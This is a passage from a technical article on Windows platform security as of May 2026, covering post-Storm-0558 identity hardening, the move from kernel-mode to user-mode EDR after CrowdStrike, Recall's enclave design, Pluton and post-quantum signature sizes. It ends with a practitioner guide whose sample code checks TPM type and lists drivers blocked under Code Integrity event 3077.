&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The three insights are not separable. The institutional failure (Storm-0558), the kernel-architectural failure (CrowdStrike), and the AI-trust-model failure (Recall and the EchoLeak class) are one architectural inflection seen from three angles: the layer above the OS has become the soft layer, and the OS-layer primitives Microsoft spent 25 years building do not extend upward into it. WESP, SFI, and the Recall Generation-3 architecture are Microsoft&apos;s first sustained engineering re-architecture of all three soft spots in parallel.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The thesis foregrounds the third-party kernel privilege insight because CrowdStrike is the single most measurable evidence -- the §4.3 numbers above, plus the Delta cancellations and the April 14, 2026 Cross-Signing trust deprecation. The other two are the context that explains &lt;em&gt;why&lt;/em&gt; the layer above the OS is now the soft layer in multiple different ways.&lt;/p&gt;
&lt;p&gt;If those three insights are right, what does the actual production deployment picture look like in May 2026? Six surfaces. The next section walks each one.&lt;/p&gt;
&lt;h2&gt;6. State of the Art, May 2026&lt;/h2&gt;
&lt;p&gt;May 2026 is the first calendar window in which all three soft-layer responses are simultaneously visible in production deployment, sanctioned private preview, or public roadmap. Six surfaces have to be evaluated together.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Identity.&lt;/strong&gt; MSA and Entra ID signing keys live in hardware-backed security modules with automatic rotation [@azure-managed-hsm]; the MSA signing service runs in Azure Confidential VMs and Entra ID signing service migration is in progress [@sfi-apr-2025] [@azure-confidential-vm]. Microsoft&apos;s April 2025 progress report states that 90% of Entra ID tokens for Microsoft&apos;s own apps validate through the hardened identity SDK [@sfi-apr-2025]. Continuous Access Evaluation is the default revocation primitive for Microsoft 365 [@cae-docs]. Kerberos and SChannel post-quantum migration roadmaps are public; ML-DSA code-signing is in research.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Endpoint.&lt;/strong&gt; Windows 11 24H2 RTM&apos;d on October 1, 2024 for broad SKUs (Copilot+ PCs reached the same RTM on June 18, 2024, without Recall) [@copilot-pcs-may-20]. Windows 11 25H2 is in market. Windows 10 went end-of-life on October 14, 2025 [@ms-windows10-lifecycle]. Smart App Control ships default-on for new installs; Personal Data Encryption is generally available; Application Security Reduction rules cover AI-feature exclusions; Recall is GA on Snapdragon, AMD, and Intel Copilot+ silicon [@recall-manage-docs].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Antivirus and EDR.&lt;/strong&gt; The Windows Endpoint Security Platform is in MVI 3.0 private preview as of July 2025 with Bitdefender, CrowdStrike, ESET, SentinelOne, Sophos, Trellix, Trend Micro, and WithSecure participating [@ms-securityweek-wesp] [@wri-jun26-2025]. Defender is already user-mode-capable. The April 14, 2026 Windows security update has begun the Cross-Signing Program trust deprecation in evaluation mode with the 100-runtime-hour and 2-or-3-restart criteria; WHCP-only enforcement is opt-in [@techcommunity-cross-signing] [@april-2026-driver-kb].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;On-device AI.&lt;/strong&gt; Recall Generation-3 is the worked example of the VBS Enclave plus TPM-rooted plus Windows Hello ESS gating pattern [@recall-davuluri-sept27-2024]. Copilot Vision and the on-device agent surface inherit the same template. Azure AI Content Safety Prompt Shields are the input-filter substrate for prompt-injection mitigation [@jailbreak-detection-shields]. OWASP LLM Top 10 [@owasp-llm-top10] and NIST AI RMF [@nist-ai-rmf] [@nist-ai-600-1] are the threat-class taxonomies.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Hardware.&lt;/strong&gt; Pluton is across all three major x86 vendors plus Snapdragon: AMD Ryzen 6000+; Intel Core Ultra Series 2 and Series 3 with Partner Security Engine; Qualcomm Snapdragon 8cx Gen 3 and X Series [@pluton-docs]. Pluton firmware on 2024+ AMD and Intel ships through the OS update servicing channel. Per the November 2025 SFI report, Surface UEFI firmware and Windows drivers are being rewritten in Rust [@sfi-nov-2025-windows].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Cryptography.&lt;/strong&gt; SymCrypt-OpenSSL ships with ML-KEM and ML-DSA. TLS 1.3 with ML-KEM hybrid key exchange is in SChannel preview. DPAPI-NG envelope-key migration to ML-KEM is in research [@sfi-apr-2025] [@fips-203] [@fips-204].&lt;/p&gt;
&lt;h3&gt;Cross-platform comparison&lt;/h3&gt;
&lt;p&gt;The state of the art is plural. Apple has shipped a user-mode Endpoint Security Framework since macOS 10.15 in October 2019 [@apple-esf-docs]; the Windows transition is catching up to an existing platform precedent rather than inventing the architecture. For cloud-attested AI confidentiality, Apple Private Cloud Compute is the published reference design [@apple-pcc]. For kernel-resident EDR with constrained programmability, the Linux eBPF route -- Falco and Tetragon -- is a credible third option [@falco-docs] [@tetragon-docs]. Microsoft maintains an &lt;code&gt;eBPF for Windows&lt;/code&gt; project that targets networking-class use cases, not EDR-class collection, so eBPF is not a third Windows option as of May 2026 [@ms-ebpf-for-windows].&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Surface&lt;/th&gt;
&lt;th&gt;Microsoft 2026 position&lt;/th&gt;
&lt;th&gt;Apple peer&lt;/th&gt;
&lt;th&gt;Linux peer&lt;/th&gt;
&lt;th&gt;Status&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Identity-token custody&lt;/td&gt;
&lt;td&gt;Managed HSM + Confidential VMs [@azure-managed-hsm]&lt;/td&gt;
&lt;td&gt;iCloud Keychain, ADP&lt;/td&gt;
&lt;td&gt;AWS CloudHSM [@aws-cloud-hsm]&lt;/td&gt;
&lt;td&gt;Live, post-Storm-0558&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;EDR architecture&lt;/td&gt;
&lt;td&gt;WESP user-mode, MVI 3.0 private preview [@wri-jun26-2025]&lt;/td&gt;
&lt;td&gt;ESF, GA since macOS 10.15 [@apple-esf-docs]&lt;/td&gt;
&lt;td&gt;eBPF: Falco, Tetragon [@falco-docs] [@tetragon-docs]&lt;/td&gt;
&lt;td&gt;Private preview&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;On-device AI confidentiality&lt;/td&gt;
&lt;td&gt;Recall: VBS Enclave + TPM + Hello ESS [@recall-davuluri-sept27-2024]&lt;/td&gt;
&lt;td&gt;On-device Apple Intelligence&lt;/td&gt;
&lt;td&gt;None equivalent&lt;/td&gt;
&lt;td&gt;GA May 2025&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cloud-attested AI&lt;/td&gt;
&lt;td&gt;M365 Copilot tenant boundary; Confidential Inferencing roadmap&lt;/td&gt;
&lt;td&gt;Private Cloud Compute [@apple-pcc]&lt;/td&gt;
&lt;td&gt;None equivalent&lt;/td&gt;
&lt;td&gt;Apple ahead&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hardware RoT&lt;/td&gt;
&lt;td&gt;Pluton (AMD, Intel, Qualcomm) [@pluton-docs]&lt;/td&gt;
&lt;td&gt;Secure Enclave Processor&lt;/td&gt;
&lt;td&gt;Various (Google Titan, AWS Nitro)&lt;/td&gt;
&lt;td&gt;Pluton ahead on PC&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Post-quantum&lt;/td&gt;
&lt;td&gt;SymCrypt ML-KEM, ML-DSA; TLS preview [@fips-203] [@fips-204]&lt;/td&gt;
&lt;td&gt;CryptoKit ML-KEM, iMessage PQ3&lt;/td&gt;
&lt;td&gt;Liboqs, OpenSSL providers&lt;/td&gt;
&lt;td&gt;Industry parity&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Falco&apos;s &lt;em&gt;ADOPTERS.md&lt;/em&gt; lists Booz Allen Hamilton, Frame.io, GitLab, MathWorks, Secureworks, Skyscanner, Sumo Logic, and Shopify as production adopters as of May 2026 [@falco-adopters]. Earlier write-ups frequently named Google, Netflix, and Pinterest; that list is incorrect against the current file.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s distinctive bet is the institution-plus-kernel-architecture-plus-AI-trust-model triple. No peer matches at all three layers simultaneously. Apple has the cleanest user-mode EDR story and the cleanest cloud-attested AI story; it does not have a public equivalent to SFI&apos;s institutional commitments at the corporate-governance level. Linux has the most flexible kernel-residency-with-constrained-programmability story for EDR; it has no equivalent to the Recall-style on-device AI feature plane because no Linux desktop ships such a feature at scale.&lt;/p&gt;
&lt;p&gt;The state of the art is plural. Three real and live disagreements remain unresolved as of May 2026, and they sit at the heart of where the field goes next.&lt;/p&gt;
&lt;h2&gt;7. Competing Approaches&lt;/h2&gt;
&lt;p&gt;Three real and live disagreements as of May 2026. The article&apos;s thesis takes a position on the first; the other two are honestly named as open.&lt;/p&gt;
&lt;h3&gt;Inside the kernel or outside&lt;/h3&gt;
&lt;p&gt;The first disagreement sits at the heart of the article&apos;s thesis. Microsoft and Apple converge on outside-the-kernel as the strategic answer -- WESP on the Windows side [@wri-jun26-2025], the Endpoint Security Framework on the macOS side, generally available since October 2019 [@apple-esf-docs]. Linux&apos;s eBPF-based EDR architectures are a third option that combines kernel-residency with constrained programmability -- the eBPF verifier rejects programs that can crash the kernel before they load [@falco-docs] [@tetragon-docs]. CrowdStrike, SentinelOne, and Sophos all have public commitments to the WESP user-mode path while continuing to ship kernel components during the transition [@ms-securityweek-wesp].&lt;/p&gt;
&lt;p&gt;The trade-offs are honest. In-kernel sees more, runs faster on the hot paths, and can intervene at lower latency. User-mode cannot crash the OS, can be sandboxed, and trades blast radius for visibility. eBPF tries to take both: kernel-residency speed plus a static verifier that bounds what the program can do.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Architecture&lt;/th&gt;
&lt;th&gt;Visibility&lt;/th&gt;
&lt;th&gt;Blast radius&lt;/th&gt;
&lt;th&gt;Latency&lt;/th&gt;
&lt;th&gt;Attestation&lt;/th&gt;
&lt;th&gt;Deployment status&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Legacy in-kernel third-party&lt;/td&gt;
&lt;td&gt;Highest&lt;/td&gt;
&lt;td&gt;Whole OS BSOD risk (CrowdStrike-class)&lt;/td&gt;
&lt;td&gt;Lowest&lt;/td&gt;
&lt;td&gt;KMCS + WHCP&lt;/td&gt;
&lt;td&gt;Default through April 2026; cross-signing trust deprecated [@techcommunity-cross-signing]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WESP user-mode (Windows)&lt;/td&gt;
&lt;td&gt;High via OS-provided ETW + brokers [@wri-jun26-2025]&lt;/td&gt;
&lt;td&gt;User-mode service restart&lt;/td&gt;
&lt;td&gt;Higher than kernel-mode&lt;/td&gt;
&lt;td&gt;OS-attested user-mode service&lt;/td&gt;
&lt;td&gt;MVI 3.0 private preview [@ms-securityweek-wesp]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Apple ESF (macOS)&lt;/td&gt;
&lt;td&gt;High via system extensions [@apple-esf-docs]&lt;/td&gt;
&lt;td&gt;User-mode extension only&lt;/td&gt;
&lt;td&gt;Higher than kernel-mode&lt;/td&gt;
&lt;td&gt;macOS notarization&lt;/td&gt;
&lt;td&gt;GA since 10.15&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;eBPF (Linux: Falco, Tetragon) [@falco-docs] [@tetragon-docs]&lt;/td&gt;
&lt;td&gt;High; in-kernel programs&lt;/td&gt;
&lt;td&gt;Verifier-bounded; cannot crash kernel&lt;/td&gt;
&lt;td&gt;Near kernel-mode&lt;/td&gt;
&lt;td&gt;None standardized&lt;/td&gt;
&lt;td&gt;Production at Booz Allen, GitLab, MathWorks [@falco-adopters]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The article&apos;s thesis takes the position that the CrowdStrike proof case has settled the trade-off in favor of out-of-kernel for the general AV and EDR class. The lingering question is whether eBPF-style constrained programmability is a viable third option in the Windows lineage. Microsoft&apos;s &lt;code&gt;eBPF for Windows&lt;/code&gt; repository targets networking, not EDR collection [@ms-ebpf-for-windows]; nothing in the public roadmap suggests that changes before Part 7.&lt;/p&gt;
&lt;h3&gt;Hardware-rooted on-device or cloud-attested&lt;/h3&gt;
&lt;p&gt;The second disagreement sits at the boundary of confidential computing and AI inference. Apple&apos;s Private Cloud Compute bets that the heavy AI inference belongs in attested confidential-VM cloud nodes -- five core requirements (stateless computation, enforceable guarantees, no privileged runtime access, non-targetability, verifiable transparency) [@apple-pcc]. Microsoft (Recall, Copilot+ on-device inference) and Google bet on hardware-rooted on-device enclaves; the Recall Generation-3 architecture is the worked Windows example [@recall-davuluri-sept27-2024]. The trade-offs are latency, privacy-by-non-transmission, the hardware-attestation surface, and the harder question of what happens when the model itself becomes sensitive intellectual property the device must protect from the device&apos;s own owner.&lt;/p&gt;
&lt;h3&gt;Whether the AI trust boundary can be formalized at all&lt;/h3&gt;
&lt;p&gt;The third disagreement is the hardest. Anthropic&apos;s published prompt-injection research note acknowledges directly that prompt injection is &quot;far from a solved problem&quot; and that &quot;every webpage an agent visits is a potential vector for attack&quot; [@anthropic-prompt-injection] [@anthropic-claude-chrome]. The structural question is whether the AI-agent-as-trust-principal model can be made architecturally safe at all, or whether the only durable answer is to keep the agent in a strict permission cage along the lines of the iOS App Sandbox model or Win32 App Isolation [@app-isolation]. The article must name this disagreement as live, not pretend it is resolved.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s &lt;code&gt;eBPF for Windows&lt;/code&gt; repository describes itself as a work in progress to bring existing eBPF toolchains and APIs from the Linux community to Windows [@ms-ebpf-for-windows]. As of May 2026 the project targets networking use cases. It is not yet a Windows-side answer to Falco or Tetragon.&lt;/p&gt;
&lt;p&gt;Some bounds in the era are honest disagreements; others are mathematical. The next section walks the limits that &lt;em&gt;cannot&lt;/em&gt; be argued away.&lt;/p&gt;
&lt;h2&gt;8. Theoretical Limits&lt;/h2&gt;
&lt;p&gt;Some of the era&apos;s bounds are not engineering deficits. They are mathematical, physical, or structural -- and naming them honestly is the only way to evaluate the era&apos;s architecture without sliding into apologist framing.&lt;/p&gt;
&lt;h3&gt;The Forshaw bound on Recall&lt;/h3&gt;
&lt;p&gt;James Forshaw&apos;s June 3, 2024 post named a bound that the April 2026 TotalRecall Reloaded disclosure confirmed empirically: any privilege escalation, or any non-security boundary, is sufficient to leak Recall&apos;s data because the user account that owns the data is also the principal that runs the AI feature that decrypts it [@forshaw-acl-jun3-2024]. The Generation-3 architecture pushes the &lt;em&gt;key&lt;/em&gt; into a VBS Enclave bound to a TPM-released device key gated by Windows Hello ESS [@recall-davuluri-sept27-2024]; what it cannot do is hide the &lt;em&gt;decrypted plaintext&lt;/em&gt; from the AI host process that has to render it. Microsoft&apos;s own Security Servicing Criteria treats same-user post-authentication as not a security boundary [@msrc-servicing-criteria]. TotalRecall Reloaded attacked exactly that delivery-truck process -- the &lt;code&gt;AIXHost.exe&lt;/code&gt; renderer -- and Microsoft determined the technique &quot;operates within the current, documented security design of Recall&quot; [@itnews-totalrecall-reloaded]. The §4.2 vault-and-delivery-truck framing is the empirical anchor for the Forshaw bound&apos;s general form.&lt;/p&gt;
&lt;h3&gt;The trusted-insider-with-physical-access bound on hardware enclaves&lt;/h3&gt;
&lt;p&gt;No hardware-rooted on-device confidentiality survives the device-physically-compromised attacker over a long enough adversarial window. Pluton, Hello ESS, and VBS Enclaves all raise the cost of attack; they do not eliminate it. The architectural goal is to make the attack expensive enough that mass-scale attacks become uneconomical, not to prove that no attack exists.&lt;/p&gt;
&lt;h3&gt;The 4096-byte problem in post-quantum signatures&lt;/h3&gt;
&lt;p&gt;NIST standardized three post-quantum signature families precisely because no single family has both the security-margin and the performance properties needed for every Windows surface. ML-KEM (FIPS 203) is fast but lattice-only [@fips-203]. SLH-DSA (FIPS 205) is hash-based and hedges against future lattice attacks at the cost of signatures large enough to be impractical for many surfaces [@fips-205]. ML-DSA (FIPS 204) is the workhorse but inherits the lattice-attack-class uncertainty SLH-DSA is meant to hedge against [@fips-204].&lt;/p&gt;
&lt;p&gt;The hardware bound is concrete. Per FIPS 204 final, ML-DSA-44 produces 2,420-byte signatures, ML-DSA-65 produces 3,309-byte signatures, and ML-DSA-87 produces 4,627-byte signatures [@fips-204-pdf] [@encryptionconsulting-fips204]. The TPM 2.0 Library Specification sets the default command and response buffer at 4,096 bytes (&lt;code&gt;TPM2_MAX_COMMAND_SIZE&lt;/code&gt; and &lt;code&gt;TPM2_MAX_RESPONSE_SIZE&lt;/code&gt; in the Implementation-Dependent Constants table) [@tcg-tpm2-spec] [@tpm2-tss-types]. The arithmetic is unforgiving: $$2{,}420 &amp;lt; 3{,}309 &amp;lt; 4{,}096 &amp;lt; 4{,}627$$ ML-DSA-44 and ML-DSA-65 fit in a default TPM 2.0 buffer; ML-DSA-87 does not. Any Windows surface that wants TPM-resident ML-DSA-87 signing has to either negotiate larger buffer sizes (vendor-specific) or settle for the smaller parameter set and accept a lower classical-security margin.&lt;/p&gt;
&lt;p&gt;The previous iteration of this article reported ML-DSA byte sizes as 2,420 (correctly for ML-DSA-44 but mis-labeled for ML-DSA-65) and 4,595 (incorrectly for ML-DSA-87). The corrected sizes from FIPS 204 Appendix B and the EncryptionConsulting cross-attestation are 2,420 / 3,309 / 4,627 [@fips-204-pdf] [@encryptionconsulting-fips204]. The load-bearing inequality -- ML-DSA-65 fits, ML-DSA-87 does not -- survives the correction.&lt;/p&gt;
&lt;h3&gt;The AI-agent-judgment bound&lt;/h3&gt;
&lt;p&gt;No existing formal-verification framework knows how to prove safety properties about an AI agent&apos;s decision process. The boundary is, by construction, statistical -- and statistical security boundaries are a new thing in the Windows lineage. The composition Microsoft uses today (Win32 App Isolation as the cage [@app-isolation], Prompt Shields as the input filter [@jailbreak-detection-shields], Groundedness Detection and Task Adherence as the output filter, OS-attested enclaves where confidentiality matters) reduces blast radius. It does not eliminate the class. This is the era&apos;s defining open theoretical question.&lt;/p&gt;
&lt;h3&gt;The Rice&apos;s Theorem bound on driver validation&lt;/h3&gt;
&lt;p&gt;Even WESP cannot guarantee that no future user-mode EDR component will introduce a Channel-File-291-class failure. Rice&apos;s Theorem says that no general decision procedure exists for non-trivial semantic properties of arbitrary programs; the WESP architectural fix is blast-radius reduction (kernel-mode crash becomes user-mode service restart), not defect elimination. Naming this honestly avoids the apologist failure mode in which WESP gets framed as a solution rather than a mitigation.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; WESP changes the &lt;em&gt;consequence&lt;/em&gt; of a vendor data-parsing bug from a kernel BSOD into a user-mode service restart. It does not prevent the bug. The right comparison is not &quot;the bug never happens&quot; but &quot;when the bug happens, what is the blast radius.&quot; The CrowdStrike Channel File 291 defect in a WESP-architected world is a vendor process that exits and restarts -- the host stays up.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Some of these limits will be relaxed by future engineering; others will not. The next section asks which are live research and which are accepted physical bounds.&lt;/p&gt;
&lt;h2&gt;9. Open Problems&lt;/h2&gt;
&lt;p&gt;Where active research and engineering is happening as of May 2026 -- and where the thesis&apos;s open forward questions live.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Whether the user-mode EDR API surface is empirically sufficient for the AV and EDR class.&lt;/strong&gt; WESP is in private preview as of May 2026 [@wri-jun26-2025]. Whether it can match in-kernel EDR for the BYOVD and rootkit attack class is not yet empirically settled. This is the load-bearing open question for the article&apos;s thesis. If WESP cannot deliver visibility-equivalent-to-kernel for the rootkit class, the third-party-AV-in-kernel model has not actually ended -- it has only been administratively constrained. The MVI 3.0 private preview cohort is the empirical test bed; the first public benchmark write-ups should arrive in 2026-2027.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Production deployment of post-quantum identity-token signing.&lt;/strong&gt; Kerberos PKINIT, OAuth-token JWS, SAML XMLDSig -- Apple, Google, and Microsoft all have public roadmaps; none has shipped at production scale to consumer endpoints as of May 2026. Microsoft&apos;s SFI April 2025 progress report names Kerberos PQ migration as a multi-year program [@sfi-apr-2025]; the FIPS 203/204/205 finals from August 13, 2024 are the gating standards [@fips-203] [@fips-204] [@fips-205] [@federal-register-pq].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The agentic-AI persistence attack class.&lt;/strong&gt; The CVE catalog is beginning to populate (EchoLeak [@nvd-cve-32711], PromptJacking [@koi-promptjacking], ShadowPrompt [@koi-shadowprompt], ZombAIs [@nvd-cve-53773], the Bargury chain [@mbgsec-bargury-pdf]). Microsoft&apos;s response surface is Win32 App Isolation expansion plus Edge AI Browser sandboxing plus Prompt Shields plus Distinct Agent Accounts (announced in the November 18, 2025 roadmap post) [@nov18-2025-preparing-next] [@app-isolation] [@jailbreak-detection-shields]. An OS-level &quot;policy on AI agent judgment&quot; primitive is not yet visible in production.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Whether SFI&apos;s cultural change compounds.&lt;/strong&gt; The April 2025 and November 2025 progress reports quantify improvement on the identity-token and signing-key axes [@sfi-apr-2025] [@sfi-nov-2025-windows]. Whether the same compounding occurs on the supply-chain, third-party-dependency, and human-OPSEC axes is the next progress report&apos;s load-bearing claim. The Hotpatch metric (81% of enrolled devices compliant within 24 hours of Patch Tuesday) [@sfi-nov-2025-windows] is the most measurable single indicator.&lt;/p&gt;
&lt;p&gt;The OpenID Foundation Shared Signals Framework is the cross-vendor standardization vehicle for Continuous Access Evaluation equivalents [@openid-sse]; production-grade CAE-equivalent deployments outside the Microsoft 365 boundary are a 2026-2027 open problem.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Whether the Pluton-vs-discrete-TPM bifurcation gets settled.&lt;/strong&gt; As of May 2026, Dell, Lenovo, and HP still have public reservations about Pluton-as-TPM on enterprise SKUs; the Pluton-as-TPM configurability flag is the live compromise [@pluton-docs]. The default behavior varies by OEM and SKU.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The forward question.&lt;/strong&gt; Does the WESP rollout land in time for the 2026 ransomware wave? If WESP private preview hardens into GA before the next CrowdStrike-class incident -- malicious or not -- then the institutional response has matched the threat timeline. If it does not, the era&apos;s open question becomes the opening question of Part 7.&lt;/p&gt;
&lt;p&gt;If those are the open problems, the question for a working practitioner is: what should you actually do today? The next section answers per surface.&lt;/p&gt;
&lt;h2&gt;10. Practical Guide&lt;/h2&gt;
&lt;p&gt;What a Windows platform security practitioner should be doing today, per surface. The thesis is the architectural diagnosis; this section is the operational prescription.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Identity.&lt;/strong&gt; Move your workloads to the hardened identity SDK; require Continuous Access Evaluation on Conditional Access policies; rotate any unrotated long-lived signing keys; verify your tenant&apos;s Entra ID and MSA flow is on the post-SFI signing-key infrastructure [@sfi-apr-2025] [@cae-docs].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Endpoint.&lt;/strong&gt; Default-on Smart App Control on new builds; enable Personal Data Encryption for user-folder protection; deploy Application Security Reduction rules including the AI-feature exclusions; track WESP private-preview availability if you ship an antivirus or EDR product [@wri-jun26-2025].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;AV and EDR.&lt;/strong&gt; If you operate a Windows fleet, audit your kernel-driver dependency surface against the April 2026 vulnerable-driver-blocking list (the &lt;code&gt;psmounterex.sys&lt;/code&gt; family is the named exemplar) [@april-2026-driver-kb] [@driver-block-rules]; verify your AV or EDR vendor has a WESP transition roadmap and an MVI 3.0 commitment [@ms-securityweek-wesp]; budget for a 12-to-24-month transition from kernel-mode to user-mode EDR; instrument Event ID 3077 in the Code Integrity log for blocked-driver visibility [@techcommunity-cross-signing].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;AI features.&lt;/strong&gt; Default-off the AI features that store user content (Recall, Copilot Vision history) until you have an enterprise policy; use the Intune Settings Catalog policies for Recall (&lt;code&gt;AllowRecallEnablement&lt;/code&gt;, &lt;code&gt;DisableAIDataAnalysis&lt;/code&gt;) [@recall-manage-docs]; evaluate prompt-injection exposure for every browser-integrated and Office-integrated AI agent [@anthropic-prompt-injection]; treat the AI agent&apos;s network reach as a Conditional Access surface.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Post-quantum.&lt;/strong&gt; Audit your TLS, IPsec, code-signing, and key-management surfaces for PQ-migration readiness; track Microsoft&apos;s published PQ-migration timelines per surface [@sfi-apr-2025]; do not deploy custom ML-KEM or ML-DSA outside NIST-validated libraries [@fips-203] [@fips-204].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Pluton.&lt;/strong&gt; Verify your hardware-refresh cycle moves to Pluton-capable silicon (AMD Ryzen 6000+; Intel Core Ultra Series 2 and later; Snapdragon 8cx Gen 3 and X Series) [@pluton-docs]; decide your Pluton-as-TPM configuration policy for new procurement; remember &quot;Pluton present&quot; is not &quot;Pluton enabled&quot; -- confirm OEM-exposed TPM type via &lt;code&gt;Get-Tpm&lt;/code&gt; plus BIOS toggle inspection.&lt;/p&gt;
&lt;p&gt;Two of those operational steps -- the Pluton-as-TPM status check and the Event ID 3077 monitoring -- are concrete enough to demonstrate. The runnable code blocks below are the verifiable form.&lt;/p&gt;
&lt;p&gt;{`
// PowerShell on Windows: Get-Tpm | Select-Object ManufacturerIdTxt, ManufacturerVersion, ManagedAuthLevel
// The JSON below is a representative shape returned by a Pluton-as-TPM machine.
const tpm = {
  ManufacturerIdTxt: &quot;MSFT&quot;,
  ManufacturerVersion: &quot;1.0.0.0&quot;,
  ManagedAuthLevel: &quot;Full&quot;,
  TpmPresent: true,
  TpmReady: true,
};&lt;/p&gt;
&lt;p&gt;function classifyTpm(tpm) {
  if (!tpm.TpmPresent) return &quot;no TPM detected&quot;;
  if (!tpm.TpmReady)   return &quot;TPM present but not ready (clear/initialize via tpm.msc)&quot;;
  if (tpm.ManufacturerIdTxt === &quot;MSFT&quot;) return &quot;Pluton-as-TPM (Microsoft firmware TPM)&quot;;
  if (tpm.ManufacturerIdTxt === &quot;AMD&quot; || tpm.ManufacturerIdTxt === &quot;INTC&quot;)
    return tpm.ManufacturerIdTxt + &quot; firmware TPM (fTPM); Pluton may be present but not the TPM&quot;;
  return &quot;discrete TPM by manufacturer &quot; + tpm.ManufacturerIdTxt;
}&lt;/p&gt;
&lt;p&gt;console.log(classifyTpm(tpm));
`}&lt;/p&gt;
&lt;p&gt;{`
// PowerShell: Get-WinEvent -LogName &apos;Microsoft-Windows-CodeIntegrity/Operational&apos; -FilterXPath &quot;*[System[EventID=3077]]&quot;
// Event ID 3077 = a driver was blocked from loading.
// Representative subset of fields shown below.
const events = [
  { Id: 3077, FileName: &quot;psmounterex.sys&quot;, PublisherName: &quot;Cross-Signed Legacy CA&quot;,  Action: &quot;Blocked&quot; },
  { Id: 3077, FileName: &quot;vulndrv.sys&quot;,     PublisherName: &quot;WHCP&quot;,                    Action: &quot;Blocked-Driver-Blocklist&quot; },
  { Id: 3076, FileName: &quot;okaydriver.sys&quot;,  PublisherName: &quot;WHCP&quot;,                    Action: &quot;AuditOnly&quot; },
];&lt;/p&gt;
&lt;p&gt;const blockedLoads = events.filter(e =&amp;gt; e.Id === 3077 &amp;amp;&amp;amp; e.Action.startsWith(&quot;Blocked&quot;));
for (const e of blockedLoads) {
  console.log(&quot;BLOCKED:&quot;, e.FileName, &quot;(&quot; + e.PublisherName + &quot;)&quot;);
}
`}&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The April 2026 vulnerable-driver-blocking list names &lt;code&gt;psmounterex.sys&lt;/code&gt; as the first exemplar [@april-2026-driver-kb]. Any third-party tool that depends on it for backup or storage management will fail until the vendor ships a WHCP-signed replacement. Inventory your driver dependency graph before the April 14, 2026 Patch Tuesday lands across your fleet.&lt;/p&gt;
&lt;/blockquote&gt;

The April 2025 SFI progress report states that Entra ID and MSA access-token signing keys are in hardware-backed security modules with automatic rotation, and that the MSA signing service runs in Azure Confidential VMs [@sfi-apr-2025]. This is a Microsoft-side fact about *Microsoft&apos;s own tenants and signing services*, not a customer-tunable setting. For your own tenant, the things you can actually verify are: that Conditional Access policies enable CAE (Entra admin center: Conditional Access &amp;gt; Sessions); that your applications validate the `iss`, `aud`, `kid`, and `tid` claims per RFC 8725 [@rfc-8725]; and that any long-lived application secrets you manage are stored in Azure Key Vault Managed HSM with rotation enabled [@azure-managed-hsm]. There is no customer-visible knob for &quot;use the post-SFI signing service&quot; -- the signing service is upstream of your tenant and is managed by Microsoft.
&lt;h2&gt;11. Frequently Asked Questions&lt;/h2&gt;
&lt;p&gt;Seven load-bearing misconceptions of the era. Each gets a short answer with a back-reference to the relevant section.&lt;/p&gt;

No. Microsoft&apos;s September 6, 2023 post initially hypothesized that path, then retracted it in an in-place edit on March 12, 2024 with the verbatim sentence: &quot;we have not found a crash dump containing the impacted key material&quot; [@msrc-storm0558-key-acq]. The CSRB report (April 2, 2024, page 17) is equally explicit: &quot;Microsoft has been unable to determine how or when Storm-0558 obtained the MSA key&quot; [@csrb-2024]. The acquisition mechanism is, as of May 2026, unknown. See section 3.

No. Windows 11 24H2 reached Copilot+ PC RTM on June 18, 2024 and broad-SKU RTM on October 1, 2024; neither shipped Recall. Recall was pulled from the planned June 18, 2024 Copilot+ PC ship date via an in-place editor&apos;s note on the June 7, 2024 Davuluri post -- a five-day pull, not &quot;weeks before launch&quot; [@recall-davuluri-jun7-2024]. Recall returned to the Windows Insider Program on November 22, 2024 and reached general availability on May 13, 2025 [@recall-manage-docs]. See section 4.2.

